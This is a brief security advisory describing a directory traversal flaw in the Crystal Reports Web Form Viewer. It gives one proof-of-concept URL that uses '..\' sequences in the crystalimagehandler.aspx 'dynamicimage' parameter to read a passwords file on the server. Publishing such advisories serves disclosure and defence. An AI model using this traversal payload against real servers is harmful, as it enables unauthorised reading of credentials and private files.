Business Objects Crystal Reports Web Form Viewer Directory Traversal Vulnerability

Business Objects Crystal Reports Web Form Viewer Directory Traversal Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/crystalreportviewers/crystalimagehandler.aspx?dynamicimage=..\..\..\..\..\mydocuments\private\passwords.txt